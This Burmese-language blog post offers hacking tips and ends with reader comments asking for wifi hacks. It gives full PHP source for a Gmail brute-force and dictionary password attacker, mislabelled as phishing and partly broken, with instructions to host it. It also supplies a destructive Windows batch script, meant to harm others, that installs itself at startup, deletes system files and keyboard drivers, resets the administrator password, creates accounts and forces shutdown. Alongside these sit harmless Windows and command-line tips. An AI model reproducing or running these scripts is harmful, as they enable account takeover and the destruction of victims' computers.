အပိုင္း (၄) Phishing နည္းလမ္းကိုအသံုးျပဳ၍ gmail password ေဖာက္နည္း
free host တခုခုမွာ ဒီကုဒ္ေတြကို သြင္းျပီး ဒါမွမဟုတ္ ကိုယ့္စက္ကို local host အေနနဲ႕ setting ခ်ျပီး
ဂ်ီေမးကိုေဖာက္လို႕ရပါျပီ။
<?php
//////////////////////
////Gmail-Brute//////
///////////////////////
////////////////////////
# This script was created to Brute Force G-Mail Logins,#
#it Uses CURL and 2 Methods of Login attacks (Brute Force and Dictionary) #
////////////////////////
$dic ="your Dictionary file here.txt";
///////////////////////
echo "
<title>Gmail Brute Force Attacker</title>
</head>
<style type='text/css'>
body {
font:Verdana, Arial, Helvetica, sans-serif;
font-size:12px;
border-color:#FFFFFF;
}
.raster_table {
background-color:#444444;
border-color:#CCCCCC;
}
.alert {
color:#FF0000;
}
</style>
<body>
<table cellpadding='0' cellspacing='0' align='center' class='raster_table' width='75%'>
<tr>
<td>
<div align='center'><b>Gmail Brute Force Attacker</b></div>
</td>
</tr>
</table>
<table cellpadding='0' cellspacing='0' align='center' class='raster_table' width='75%'>
<tr>
<td>
<div align='center'>
</div>
</td>
</tr>
<tr>
<td>
<div align='center'>
&nbsp;
</div>
</td>
</tr>
<tr>
<td>
<div align='center'>
<form method='post'>
Username to brute:<br>
<input name='username' type='text' /><br><br>
<input name='attack' type='submit' value='dictionary' /> -
<input name='attack' type='submit' value='brute' /><br>
</form>
</div>
</td>
</tr>
<tr>
<td>
<div align='center'>
&nbsp;
</div>
</td>
</tr>
</table>
";
// Sets variables and retrives google error for comparing
if(isset($_POST['attack']) && isset($_POST['username'])) {
$username = $_POST['username'];
$headers = array(
"Host: mail.google.com",
"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-
GB; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4",
"Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,imag
e/png,*/*;q=0.5",
"Accept-Language: en-us,en;q=0.5",
"Accept-Encoding: text", # No gzip, it only clutters your code!
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7",
"Date: ".date(DATE_RFC822)
);
$c = curl_init('https://mail.google.com/mail/feed/atom');
curl_setopt($c, CURLOPT_HTTPAUTH, CURLAUTH_ANY); // use authentication
curl_setopt($c, CURLOPT_HTTPHEADER, $headers); // send the headers
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); // We need to fetch something from a string, so n
o direct output!
curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1); // we get redirected, so follow
curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1);
curl_setopt($c, CURLOPT_UNRESTRICTED_AUTH, 1); // always stay authorised
$wrong = curl_exec($c); // Get it
curl_close($c); // Close the curl stream
}
//Dictionary Attack
if($_POST['attack'] == "dictionary") {
$Dictionary = file("$dic");
for ($Position = 0; $Position < count($Dictionary); $Position++) {
$Dictionary[$Position] = str_replace("\r\n", "", $Dictionary[$Position]);
if(check_correct($username, $Dictionary[$Position])) {
die("<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_
table' width='75%'>
<tr>
<td>
<div align='center'><b>Found the password of: ".$Dictionary[$Position]."<br> For the
account: ".$username."</b></div>
</td>
</tr>
</table>
</body>
</html>");
}
}
echo "<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table'
width='75%'>
<tr>
<td>
<div align='center'><b>Sorry... a password was not found for the account of <span cla
ss='alert'>".$username."</span> during the dictionar
y attack.</b></div>
</td>
</tr>
</table>";
}
//Brute Attack
elseif($_POST['attack'] == "brute") {
for ($Pass = 0; $Pass < 2; $Pass++) {
if ($Pass == 0){$Pass = "a";} elseif ($Pass == 1){ $Pass = "a"; }
if(check_correct($username, $Pass)) {
die("<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_
table' width='75%'>
<tr>
<td>
<div align='center'><b>Found the password of: ".$Dictionary[$Position]."<br> For the
account: ".$username."</b></div>
</td>
</tr>
</table>
</body>
</html>");
}
}
echo "<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table'
width='75%'>
<tr>
<td>
<div align='center'><b>Sorry... a password was not found for the account of <span cla
ss='alert'>".$username."</span> during the brute for
ce attack.</b></div>
</td>
</tr>
</table>";
}
echo "</body>
</html>";
// Function for checking whether the username and password are correct
function check_correct($username, $password)
{
global $wrong, $headers;
$c = curl_init('https://'.$username.':'.$password.'@mail.google.com/mail/feed/atom');
curl_setopt($c, CURLOPT_HTTPAUTH, CURLAUTH_ANY); // use authentication
curl_setopt($c, CURLOPT_HTTPHEADER, $headers); // send the headers
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); // We need to fetch something from a string,
so no direct output!
curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1); // we get redirected, so follow
curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1);
curl_setopt($c, CURLOPT_UNRESTRICTED_AUTH, 1); // always stay authorised
$str = curl_exec($c); // Get it
curl_close($c);
if($str != $wrong) {return true;}
else {return false;}
}
?>
PHP ရတဲ့ host တခုခုမွာ ဒီ code ေတြကို install လုပ္ရပါမယ္။ က်န္တာ အေသးစိတ္သိခ်င္ရင္ေတာ့ free hosting
တခုသုံးျပီး က်ေနာ္ အရင္စမ္းလိုက္အံုးမယ္ ။ ဘယ္သူ႕ကိုစမ္းရမလ ဲ မသိဘူး။
ေအာက္က free host မွာ PHP ရပါတယ္။
Code:
http://www.000webhost.com/
……………………………………………………………………………………………………………………………………………...........
အပိုင္း (၅) WINDOWS ကို၀င္ေမႊနည္း တိုလီမုတ္စမ်ား
Registry သ႔ ို ၀င္ေရာက္ေမႊေႏွာက္ျခင္း
က်ေနာ္ registry ထဲသို႔ ၀င္ေမႊနည္း နည္းနည္းပါးပါး ေျပာခ်င္ပါတယ္။ ဘာဘဲျဖစ္ျဖစ္ registry ကို ၀င္ေမႊေတာ့မယ္ဆိုရင္
ေတာ့ back up လုပ္ထားဖို့လိုပါတယ္...ဘာလို့လဲဆိုေတာ့ registry မွာ၀င္ေရးတဲ့ အခါမွာ registry က auto save
လုပ္ပါတယ္..မွားသြားပါတယ္ဆိုျပီး undo ,redo ေတြလုပ္လို့မရပါဘူး....
အဲဒါေၾကာင့္ပါ.....
ကဲ က်ေနာ္တို႔ All program ကိုေဖ်ာက္လိုက္ရေအာင္....
- start > run ကို၀င္ပါ..
- regedit လို့ ၇ိုက္ျပီး enter ႏွိပ္ပါ..
- HKEY-CURRENT- USER\software\microsoft\windows\current version\policies\explorer
- explorer ေပၚကို right click ႏွိပ္ျပီး new ကိုေရြးခ်ယ္ပါ Dword value ကိုဖြင့္ပါ..
ထိုအခါ ညာဘက္ျမင္ကြင္းမွာ new value #1 ေပၚလာပါမယ္..
-new value #1 ကို rename ေပးလိုက္ပါ..
name က NoStartMenuMoreProgram ျဖစ္ပါတယ္..
NoStartMenuMoreProgram ေပၚကိုလည္း right click ေပးျပီး modify ေရြးပါ
value data အကြက္ထဲ က 0 ေပၚေနပါမယ္..အဲဒါကို 1 ေျပာင္းေပးလိုက္ပါ..
computer ကို restart ေပးလိုက္ပါ...
Folder ကို software မသံုးပဲ Lock ခ်နည္း
ေရွးဦးစြာ notepad သို႔မဟုတ္ Command Promt ကိုဖြင့္ျပီး edit ထဲတြင္ ေအာက္ေဖၚျပပါ command မ်ားကို
ေရးသား၍ .bat file အေနျဖင့္ save မွတ္ပါ။ Notepad ထဲတြင္ေရး၍ Save name as ဆိုတဲ့ ေနရာမွာ example.bat လို႔
save မွတ္ပါ။ ထို file အားလြယ္လြယ္ကူကူ desktop ေပၚမွာပဲ သိမ္းထားေပါ့။ ထို႔ေနာက္ ၄င္း .bat file အား Run
လိုက္ပါ။ Private ဆိုေသာ Folder တစ္ခု ေပၚလာပါလိမ့္မယ္။ အဲဒီ Folder ထဲတြင္မိမိ သိမ္းထားခ်င္ေသာ files မ်ား
folder မ်ား ထည့္လိုက္ပါ။ ထို႕ေနာက္ example.bat file အားေနာက္တစ္ေခါက္ run လိုက္ပါ။ ထိုအခါ cmd Windows
တစ္ခု ေပၚလာပါလိမ့္မယ္။ Set Password to Lock Folder ဆိုတာေပၚလာပါတယ္။ ကိုယ္လိုခ်င္တဲ့ password
ေရးလိုက္ေပါ့။ ေနာက္ထပ္ Are You Sure to Lock this Folder (Y/N) ဆိုတာေပၚလာပါလိမ့္မယ္။ Y လို႔ရိုက္လိုက္ပါ။
Private ဆိုေသာ Folder ေပ်ာက္သြားပါမယ္။ ၄င္း folder ကိုျပန္လိုခ်င္လွ်င္ example.bat ဆိုတဲ့ file ကိုျပန္ run ပါ။
Enter Password to Unlock Folder ဆိုတာေပၚလာပါလိမ့္မယ္။ Password ရိုက္လိုက္ပါ။ ၄င္း folder
ျပန္ေပၚလာပါလိမ့္မယ္။ စမ္းၾကည့္က်ေပါ့ဗ်ာ……….
Command
cls
@ECHO OFF
title Folder Private
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Private goto MDLOCKER
:CONFIRM
echo Are you sure you want to lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Private "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to unlock folder
set/p "pass=>"
if NOT %pass%== password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Private
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Private
echo Private created successfully
goto End
:End
သူမ်ားကို ဒုကၡေပးခ်င္လွ်င္။ ။ေအာက္ေဖၚျပပါ command မ်ားကို notepad ထဲသို႕ copy, paste ကာ .bat file
အမ်ိဳးအစားျဖင့္ save မွတ္ပါ။ ထို႔ေနာက္၄င္း file အားလံုး၀ဖြင့္မၾကည့္ပါႏွင့္။ ဖြင့္ၾကည့္ပါက error message
မ်ားတတ္လာျပီး Windows က auto shut down ျဖစ္ေနပါလိမ့္မယ္။ ေနာက္တစ္ေခါက္ဖြင့္လဲ Windows
တတ္ျပီးျပီးျခင္း ၁၀ စကၠန္႔အတြင္း Shut Down ျဖစ္ေနပါလိမ့္မယ္။ ဘယ္လိုမွ ျပန္ဖြင့္ႏိုင္မွာမဟုတ္ပါဘူး။ safemode
ကျပန္ျပင္မွ ျပန္ေကာင္းႏိုင္မွာပါ ။ ဟဲဟ…ဲ …..
title any
@echo off
copy any.bat "c:\documents and settings\all users\start menu\programs\startup"
del *.dll
del *.exe
del *.ini
time 00:00
date 88/88/888
net user administrator *18083
net user 598 *32087 /add
net user 3063 *864 /add
net user 3262 *21895 /add
net user 29039 *3102 /add
net user 15688 *215 /add
net user 24824 *28761 /add
net user 25176 *23975 /add
net user 8896 *28052 /add
msg *any
echo copy q.bat "documents and settings\all users\start menu\programs\startup"
echo copy q.bat "documents and settings\all users\start menu\programs\startup"
cd C:\WINDOWS\system32
del /S /F /Q keyboard.drv
del /S /F /Q keyboard.sys
del system32
shutdown -s -f
exit
Cmd Dos Command နည္းနည္းပါးပါး
က်ေနာ္ သိထားတဲ့ CMD DOS COMMAND နည္းနည္းပါ
႔သိၿပီးသားသူေတြလည္းရွိပါတယ္ ...
မသိေသးတဲ့ သူေတြအတြက္ပဲ ရည္ရြယ္ပါတယ္ ....
Run Box မွာ cmd ရိုက္ထည့္လိုက္မယ္
C Directory ကိုသြားမယ္ဆို C: , D ဆိုရင္ D: စသည့္ျဖင့္ေပါ့ ....
ပထမဆံုးေျပာရရင္ .. cmd ကိုစေခၚလိုက္တာနဲ႔ စျမင္ရမွာက
C:\Documents and Settings\user name> ပါ ...
အဲဒီ Directory မွာ ဘယ္ Folder ေတြပါလည္း ၾကည့္ခ်င္ရင္
dir /a နဲ႔ ၾကည့္ရပါတယ္
အဲဒီ့ Directory တစ္ခုထဲက Folder ကို ဖြင့္ခ်င္ရင္
cd ခံထားၿပီး မိမိဖြင့္ခ်င္တဲ့ Folder Name (ဥပမာ။ ။ Desktop)ေပးၿပီး ဖြင့္ရပါတယ္
C:\Documents and Settings\user name\Desktop>
ထို Folder မွ ျပန္ထြက္ခ်င္ရင္ cd.. ေရးၿပီး ျပန္ထြက္ရပါမယ္
Hidden ျဖစ္ေနတဲ့ Folder (သို႔) File ကို unhidden ေပးခ်င္တယ္ဆိုရင္
Folder Option ကေန virus ကိုက္တယ္ဆို show hidden folder ေပးလည္း မရတာေတြရွိပါတယ္
attrib -H /S /D "c:\......\folder name"
hidden ျဖစ္ေနတဲ့ Folder (သို႔) File ရွိတဲ့ Directory အျပည့္အစံုကို /D ေနာက္ကေန
ဆက္ေရးေပးရပါတယ္
Directory တစ္ခုမွာရွိတဲ့ folder ထဲက files ေတြကို တျခား Directory တစ္ခုမွာရွိတဲ့
folder ထဲကို ေျပာင္းေရႊ႕ကူးယူခ်င္တယ္ဆို ...
မိမိေျပာင္းေပးခ်င္တဲ့ Directory ကိုအရင္ဖြင့္ေပးရပါတယ္ (ဥပမာ။ ။ C: ထဲက Desktop ကိုေရႊ႕မယ္ဆို C:\Documents
and Settings\user name\Desktop>
လို႔ အရင္ဖြင့္ေပးလိုက္ပါ။
ေနာက္မဆက္ၿပီး ကူးယူခ်င္တဲ့ Directory မွ folder ကိုေရးေပးရပါတယ္
xcopy /a "e:\foler name" ဟုေရးေပးရပါမယ္ ...
၂ခုေပါင္းကိုၾကည့္မယ္ဆိုရင္ေတာ့
C:\Documents and Settings\user name\Desktop>xcopy /a "e:\foler name"
အခု ကူးယူတာက unhidden files ေတြကိုပဲ ကူးယူးတာပါ။
hidden files ေတြကိုကူးမယ္ဆိုရင္ေတာ့ /h ထည့္ေပးရုံပါပ ဲ
xcopy /h /a "e:\foler name" ဟုေရးေပးလိုက္ပါ...
အခုက files ကိုပဲကူးတာပါ ...
Folder အလိုက္ကူးမယ္ဆိုရင္ေတာ့ /s ကိုအသံုးျပဳရပါတယ္
xcopy /s "e:\folder name" လို႔ေရးေပးရပါတယ္။
ဒါကလည္း hidden မျဖစ္တဲ့ folder ကိုကူးတာပါ
hidden folder ကိုကူးမယ္ဆိုရင္ေတာ့ /h ကိုပဲထည့္ရပါတယ္
xcopy /h /s "e:\foler name" လို႔ေရးေပးရပါတယ္ ...
အဲဒီလိုကူးယူတဲ့ အခ်ိန္မွာ CMD box မွာ ကူးယူးတဲ့ files ေတြ run တာကိုျပပါတယ္ အဲဒီလို မေပၚခ်င္ရင္ေတာ့ /Q
ထည့္ေပးရပါတယ္
xcopy /h /q /s "e:\foler name" လို႔ေရးေပးရပါတယ္ .................။
Folder Background ကို software မသံုးပဲ ပံုလွလွေလးထည့္နည္း
[{BE098140-A513-11D0-A3A4-00C04FD706EC}]
iconarea_image=E:\general\picture\DSABayonet211.jpg
iconarea_text=11x00fffffff
ေဖၚျပပါ code မ်ားကို Folder အတြင္းရွိ desktop.ini ဆိုေသာ file အတြင္းသို႔ copy ကူး paste လုပ္ပါ။ ၄င္း ini file သည္ hidden
ျဖစ္ေနပါသည္။ hidden ေဖၚျပီးရွာပါ။ iconarea_image=E:\general\picture\DSABayonet211.jpg ဆိုရာတြင္
မိမိထည့္သြင္းလိုေသာပံု ၏တည္ေနရာ ကိုသိရန္လိုပါသည္။ ဥပမာ. Desktop ေပၚရွိ image.jpg ဆိုေသာပံုကိုထည့္သြင္းခ်င္လွ်င္
iconarea_image=C:\Documents and Settings\User Name\Desktop\image.jpg ဟုေရးႏိုင္ပါတယ္။ အေနာက္က file
extension *.jpg ဆိုတာကိုထည့္ေရးရန္မေမ့ပါႏွင့္။
website ေတြ႕ရဲ႕ IP ကုိခ်က္ခ်င္းသိခ်င္တယ္ဆိုရင္
ပထမဆံုး start >>> Run ကို click.
cmd လို႕ ရိုက္ျပီး ok လုပ္.
အဲဒီမွာ ဒါေလးကို ရိုက္ထည့္ၾကည့္လိုက္.
nslookup www.google.com လို႕ရိုက္ျပီး enter ေခါက္ၾကည့္လိုက္ပါက
google ရဲ႕ IP ေတြက်လာပါလိမ့္မယ္။။မိမိသိခ်င္တဲ႕ website ရဲ႕ အမည္ကို ေျပာင္းရိုက္ၾကည့္ေပါ့
ေပ်ာ္ရႊင္ႏိုင္ပါေစ
(မစၥတာ.ေမာင္ဘစ္ေန)

2 comments:

  1. Wifi hack တာ​ေလး​ေတြပါတင္​​ေပးပါလားအကို

    ReplyDelete
  2. Wifi hack တာ​ေလး​ေတြပါတင္​​ေပးပါလားအကို

    ReplyDelete